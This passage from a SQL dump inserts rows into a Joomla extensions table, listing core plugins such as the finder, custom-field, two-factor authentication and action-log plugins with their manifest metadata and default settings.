(437, 0, 'plg_quickicon_joomlaupdate', 'plugin', 'joomlaupdate', 'quickicon', 0, 1, 1, 1, '{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(438, 0, 'plg_quickicon_extensionupdate', 'plugin', 'extensionupdate', 'quickicon', 0, 1, 1, 1, '{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(439, 0, 'plg_captcha_recaptcha', 'plugin', 'recaptcha', 'captcha', 0, 1, 1, 0, '{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}', '{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(440, 0, 'plg_system_highlight', 'plugin', 'highlight', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"highlight\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 7, 0),
(441, 0, 'plg_content_finder', 'plugin', 'finder', 'content', 0, 0, 1, 0, '{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(442, 0, 'plg_finder_categories', 'plugin', 'categories', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(443, 0, 'plg_finder_contacts', 'plugin', 'contacts', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(444, 0, 'plg_finder_content', 'plugin', 'content', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(445, 0, 'plg_finder_newsfeeds', 'plugin', 'newsfeeds', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 4, 0),
(447, 0, 'plg_finder_tags', 'plugin', 'tags', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(448, 0, 'plg_twofactorauth_totp', 'plugin', 'totp', 'twofactorauth', 0, 0, 1, 0, '{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(449, 0, 'plg_authentication_cookie', 'plugin', 'cookie', 'authentication', 0, 1, 1, 0, '{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookie\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(450, 0, 'plg_twofactorauth_yubikey', 'plugin', 'yubikey', 'twofactorauth', 0, 0, 1, 0, '{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(451, 0, 'plg_search_tags', 'plugin', 'tags', 'search', 0, 0, 1, 0, '{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}', '{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(452, 0, 'plg_system_updatenotification', 'plugin', 'updatenotification', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_updatenotification\",\"type\":\"plugin\",\"creationDate\":\"May 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_UPDATENOTIFICATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"updatenotification\"}', '{\"lastrun\":1569378070}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(453, 0, 'plg_editors-xtd_module', 'plugin', 'module', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_module\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_MODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"module\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(454, 0, 'plg_system_stats', 'plugin', 'stats', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_stats\",\"type\":\"plugin\",\"creationDate\":\"November 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"stats\"}', '{\"mode\":3,\"lastrun\":\"\",\"unique_id\":\"8266ee9c8e1e79a5f04fdc9f61e350fec6e8e7e9\",\"interval\":12}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(455, 0, 'plg_installer_packageinstaller', 'plugin', 'packageinstaller', 'installer', 0, 1, 1, 1, '{\"name\":\"plg_installer_packageinstaller\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_PACKAGEINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"packageinstaller\"}', '', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(456, 0, 'PLG_INSTALLER_FOLDERINSTALLER', 'plugin', 'folderinstaller', 'installer', 0, 1, 1, 1, '{\"name\":\"PLG_INSTALLER_FOLDERINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_FOLDERINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"folderinstaller\"}', '', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(457, 0, 'PLG_INSTALLER_URLINSTALLER', 'plugin', 'urlinstaller', 'installer', 0, 1, 1, 1, '{\"name\":\"PLG_INSTALLER_URLINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_URLINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"urlinstaller\"}', '', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(458, 0, 'plg_quickicon_phpversioncheck', 'plugin', 'phpversioncheck', 'quickicon', 0, 1, 1, 1, '{\"name\":\"plg_quickicon_phpversioncheck\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_QUICKICON_PHPVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpversioncheck\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(459, 0, 'plg_editors-xtd_menu', 'plugin', 'menu', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_menu\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"menu\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(460, 0, 'plg_editors-xtd_contact', 'plugin', 'contact', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_contact\",\"type\":\"plugin\",\"creationDate\":\"October 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(461, 0, 'plg_system_fields', 'plugin', 'fields', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_fields\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_SYSTEM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(462, 0, 'plg_fields_calendar', 'plugin', 'calendar', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_calendar\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CALENDAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"calendar\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(463, 0, 'plg_fields_checkboxes', 'plugin', 'checkboxes', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_checkboxes\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CHECKBOXES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"checkboxes\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(464, 0, 'plg_fields_color', 'plugin', 'color', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_color\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_COLOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"color\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(465, 0, 'plg_fields_editor', 'plugin', 'editor', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_editor\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_EDITOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"editor\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(466, 0, 'plg_fields_imagelist', 'plugin', 'imagelist', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_imagelist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_IMAGELIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"imagelist\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(467, 0, 'plg_fields_integer', 'plugin', 'integer', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_integer\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_INTEGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"integer\"}', '{\"multiple\":\"0\",\"first\":\"1\",\"last\":\"100\",\"step\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(468, 0, 'plg_fields_list', 'plugin', 'list', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_list\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_LIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"list\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(469, 0, 'plg_fields_media', 'plugin', 'media', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_media\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(470, 0, 'plg_fields_radio', 'plugin', 'radio', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_radio\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_RADIO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"radio\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(471, 0, 'plg_fields_sql', 'plugin', 'sql', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_sql\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_SQL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sql\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(472, 0, 'plg_fields_text', 'plugin', 'text', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_text\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"text\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(473, 0, 'plg_fields_textarea', 'plugin', 'textarea', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_textarea\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXTAREA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"textarea\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(474, 0, 'plg_fields_url', 'plugin', 'url', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_url\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_URL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"url\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(475, 0, 'plg_fields_user', 'plugin', 'user', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_user\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(476, 0, 'plg_fields_usergrouplist', 'plugin', 'usergrouplist', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_usergrouplist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USERGROUPLIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"usergrouplist\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(477, 0, 'plg_content_fields', 'plugin', 'fields', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_CONTENT_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(478, 0, 'plg_editors-xtd_fields', 'plugin', 'fields', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(479, 0, 'plg_sampledata_blog', 'plugin', 'blog', 'sampledata', 0, 0, 1, 0, '{\"name\":\"plg_sampledata_blog\",\"type\":\"plugin\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"PLG_SAMPLEDATA_BLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"blog\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(480, 0, 'plg_system_sessiongc', 'plugin', 'sessiongc', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_sessiongc\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.6\",\"description\":\"PLG_SYSTEM_SESSIONGC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sessiongc\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(481, 0, 'plg_fields_repeatable', 'plugin', 'repeatable', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_repeatable\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FIELDS_REPEATABLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"repeatable\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(482, 0, 'plg_content_confirmconsent', 'plugin', 'confirmconsent', 'content', 0, 0, 1, 0, '{\"name\":\"plg_content_confirmconsent\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_CONTENT_CONFIRMCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"confirmconsent\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(483, 0, 'PLG_SYSTEM_ACTIONLOGS', 'plugin', 'actionlogs', 'system', 0, 0, 1, 0, '{\"name\":\"PLG_SYSTEM_ACTIONLOGS\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(484, 0, 'PLG_ACTIONLOG_JOOMLA', 'plugin', 'joomla', 'actionlog', 0, 1, 1, 0, '{\"name\":\"PLG_ACTIONLOG_JOOMLA\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_ACTIONLOG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(485, 0, 'plg_system_privacyconsent', 'plugin', 'privacyconsent', 'system', 0, 0, 1, 0, '{\"name\":\"plg_system_privacyconsent\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_PRIVACYCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacyconsent\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
